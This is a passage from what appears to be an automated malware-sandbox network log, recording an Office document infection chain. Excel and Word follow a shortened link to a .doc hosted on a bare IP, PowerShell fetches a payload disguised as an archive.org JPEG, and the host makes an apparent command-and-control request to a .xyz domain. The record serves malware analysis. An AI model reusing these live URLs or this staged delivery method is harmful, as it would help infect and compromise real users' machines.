                                                  Aug 16, 2024 09:34:13.371540070 CEST345OUTGET /jwh2/?wxW=qwiqlQOB2sBJXed4TJefnH6tfhcmjQqGh5LRBgpS3ir2H9BZzfnnysKJE+uuqh+G2a9tjGyTB/t+dcoUENF33bMIpFI3IAf6ffgxGYIPDvPvoCP/fBQOw8HyyZkd&o4=jn1L46 HTTP/1.1
                                                  Host: www.kcrkimya.xyz
                                                  Accept: */*
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:34:14.092205048 CEST225INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.14.1
                                                  Date: Fri, 16 Aug 2024 07:34:13 GMT
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Rate-Limit-Limit: 5s
                                                  X-Rate-Limit-Remaining: 19
                                                  X-Rate-Limit-Reset: 2024-08-16T07:34:18.9812535Z


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.2249161188.114.97.34432456C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-16 07:32:28 UTC323OUTGET /GmwgTs HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: jiourl.com
                                                  Connection: Keep-Alive
                                                  2024-08-16 07:32:29 UTC1095INHTTP/1.1 301 Moved Permanently
                                                  Date: Fri, 16 Aug 2024 07:32:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  set-cookie: PHPSESSID=hcig6oebb5o58thjr74ikoff8b; path=/; secure
                                                  set-cookie: short_4447=1; expires=Fri, 16-Aug-2024 07:47:28 GMT; Max-Age=900; path=/; HttpOnly; secure
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  location: http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aD0UYWeLXDGW2b%2BZQQDClAWk0k%2FpnEoxo%2B1AziDh1pVlnor68Lf%2BpUPPY%2Bv9E64Hu5sBIoCL7zRsNAoPmDkDH7QY86GM40%2BYFd%2Ftdn7EK88EBDdGigqFStfsGPIh"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb105cdb41db-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-08-16 07:32:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.2249163188.114.97.34432408C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-16 07:32:31 UTC154OUTOPTIONS / HTTP/1.1
                                                  User-Agent: Microsoft Office Protocol Discovery
                                                  Host: jiourl.com
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1
                                                  2024-08-16 07:32:31 UTC842INHTTP/1.1 405 Method Not Allowed
                                                  Date: Fri, 16 Aug 2024 07:32:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  set-cookie: PHPSESSID=t8mfuar2m35367i14un824ios2; path=/; secure
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  vary: Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JBTImt8exLssqajwhrsnjtMBz5UGOH5dcKYqAu0RijqPT9Ku%2BVUaVXKrNJeLgPj7AQWxRLy2vHQ2uDnOX0eANHPy%2B%2FLEz2pvjpdJacXyZ7GYJDI%2F%2FeD0%2B77rgJX8"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb1ece864344-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-08-16 07:32:31 UTC527INData Raw: 36 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69
                                                  Data Ascii: 66e<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Error 405</title><link href="https://fonts.googleapi
                                                  2024-08-16 07:32:31 UTC1126INData Raw: 30 61 32 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 6f 75 72 63 65 20 43 6f 64 65 20 50 72 6f 27 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 7d 68 31 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 7d 68 31 20 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 46 46 30 33 37 41 7d 61 7b 74 65 78 74 2d 64 65 63 6f 72
                                                  Data Ascii: 0a20;text-align:center;padding:0;min-height:100%;display:table;font-family: 'Source Code Pro', monospace;}h1{font-family:inherit;font-weight:700;line-height:1.1;color:inherit;font-size:36px}h1 small{font-weight:700;line-height:1;color:#FF037A}a{text-decor
                                                  2024-08-16 07:32:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.2249164188.114.97.34432408C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-16 07:32:32 UTC192OUTOPTIONS / HTTP/1.1
                                                  User-Agent: Microsoft Office Protocol Discovery
                                                  Host: jiourl.com
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1; PHPSESSID=t8mfuar2m35367i14un824ios2
                                                  2024-08-16 07:32:32 UTC768INHTTP/1.1 405 Method Not Allowed
                                                  Date: Fri, 16 Aug 2024 07:32:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  vary: Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=46f%2FTsarNQVWWzmz4aFUDurhJ%2BBvXh2PY5fGzNHWRghCUKgTpneTNPwGrbiinfSldM0i4e27yTyDEVw9H8z4YsBqjl3bd6kIkzEE2E9TXECRvD4Yez9pgep5XmTF"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb25ff5f7d00-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-08-16 07:32:32 UTC601INData Raw: 36 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69
                                                  Data Ascii: 66e<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Error 405</title><link href="https://fonts.googleapi
                                                  2024-08-16 07:32:32 UTC1052INData Raw: 3a 20 27 53 6f 75 72 63 65 20 43 6f 64 65 20 50 72 6f 27 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 7d 68 31 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 7d 68 31 20 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 46 46 30 33 37 41 7d 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 38 30 61 32 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 64 6f 74 74 65 64 20 31 70 78 20 23 37 30 37 30 37
                                                  Data Ascii: : 'Source Code Pro', monospace;}h1{font-family:inherit;font-weight:700;line-height:1.1;color:inherit;font-size:36px}h1 small{font-weight:700;line-height:1;color:#FF037A}a{text-decoration:none;color:#080a20;font-size:inherit;border-bottom:dotted 1px #70707
                                                  2024-08-16 07:32:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.2249165188.114.97.34432408C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-16 07:32:33 UTC192OUTOPTIONS / HTTP/1.1
                                                  User-Agent: Microsoft Office Protocol Discovery
                                                  Host: jiourl.com
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1; PHPSESSID=t8mfuar2m35367i14un824ios2
                                                  2024-08-16 07:32:33 UTC770INHTTP/1.1 405 Method Not Allowed
                                                  Date: Fri, 16 Aug 2024 07:32:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  vary: Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILA7cBj0qlVdm7ZWQsEwE4DamNzPtyG0v9cUl%2FFJVBJh%2B%2FS3g6iD0U2W0hwyAqZhQ1jxnahHjRVQeJMuBdL6563lYvQCcLoWRWk92uf7AqVbCxuyf2SxxGQaSXoo"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb2ae8955e82-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-08-16 07:32:33 UTC599INData Raw: 36 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69
                                                  Data Ascii: 66e<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Error 405</title><link href="https://fonts.googleapi
                                                  2024-08-16 07:32:33 UTC1054INData Raw: 6c 79 3a 20 27 53 6f 75 72 63 65 20 43 6f 64 65 20 50 72 6f 27 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 7d 68 31 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 7d 68 31 20 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 46 46 30 33 37 41 7d 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 38 30 61 32 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 64 6f 74 74 65 64 20 31 70 78 20 23 37 30 37
                                                  Data Ascii: ly: 'Source Code Pro', monospace;}h1{font-family:inherit;font-weight:700;line-height:1.1;color:inherit;font-size:36px}h1 small{font-weight:700;line-height:1;color:#FF037A}a{text-decoration:none;color:#080a20;font-size:inherit;border-bottom:dotted 1px #707
                                                  2024-08-16 07:32:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.2249166188.114.97.34432408C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-16 07:32:34 UTC177OUTHEAD /GmwgTs HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1; PHPSESSID=t8mfuar2m35367i14un824ios2
                                                  User-Agent: Microsoft Office Existence Discovery
                                                  Host: jiourl.com
                                                  2024-08-16 07:32:35 UTC885INHTTP/1.1 301 Moved Permanently
                                                  Date: Fri, 16 Aug 2024 07:32:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  location: http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc
                                                  x-turbo-charged-by: LiteSpeed
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6kkGor9vHRVIfGe9BDdi0eePGDBousK9ZW3brsZYRikuLTzn%2BVLaZorKPjytoGOv3GjjdVAHdn23Ls7n9x7SyovVkhbmoAzH1SsoYs2qzvFdaXYFE4jlPsFxm9N"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb3608b042c0-EWR
                                                  alt-svc: h3=":443"; ma=86400


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.2249168188.114.97.34432408C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-16 07:32:39 UTC196OUTHEAD /GmwgTs HTTP/1.1
                                                  User-Agent: Microsoft Office Existence Discovery
                                                  Host: jiourl.com
                                                  Content-Length: 0
                                                  Connection: Keep-Alive
                                                  Cookie: short_4447=1; PHPSESSID=t8mfuar2m35367i14un824ios2
                                                  2024-08-16 07:32:39 UTC889INHTTP/1.1 301 Moved Permanently
                                                  Date: Fri, 16 Aug 2024 07:32:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Connection: close
                                                  x-powered-by: PHP/8.1.29
                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate
                                                  pragma: no-cache
                                                  location: http://192.210.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc
                                                  x-turbo-charged-by: LiteSpeed
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xL3gzPc8K7%2Bx7tICv8u432djQVtcYovlcrF%2F5aGsHXQhrPtjteudamG6VpvKIXM1iq2weBRsHutkX%2FiyxBO9WZdda6joX6HktCCsBHzFgh0OsDLyiQ7Y3wNztX4D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8b3fbb53aaa24319-EWR
                                                  alt-svc: h3=":443"; ma=86400


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.2249171207.241.232.1544433248C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-16 07:32:46 UTC111OUTGET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                  Host: ia803104.us.archive.org
                                                  Connection: Keep-Alive
                                                  2024-08-16 07:32:46 UTC591INHTTP/1.1 200 OK
                                                  Server: nginx/1.24.0 (Ubuntu)
                                                  Date: Fri, 16 Aug 2024 07:32:46 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 1931225
                                                  Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                  Connection: close
                                                  ETag: "66a41ab4-1d77d9"
                                                  Strict-Transport-Security: max-age=15724800
                                                  Expires: Fri, 16 Aug 2024 13:32:46 GMT
                                                  Cache-Control: max-age=21600
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                  Access-Control-Allow-Credentials: true
                                                  Accept-Ranges: bytes
                                                  2024-08-16 07:32:46 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                  2024-08-16 07:32:46 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                  Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                  2024-08-16 07:32:46 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                  Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                  2024-08-16 07:32:46 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                  Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                  2024-08-16 07:32:46 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                  Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
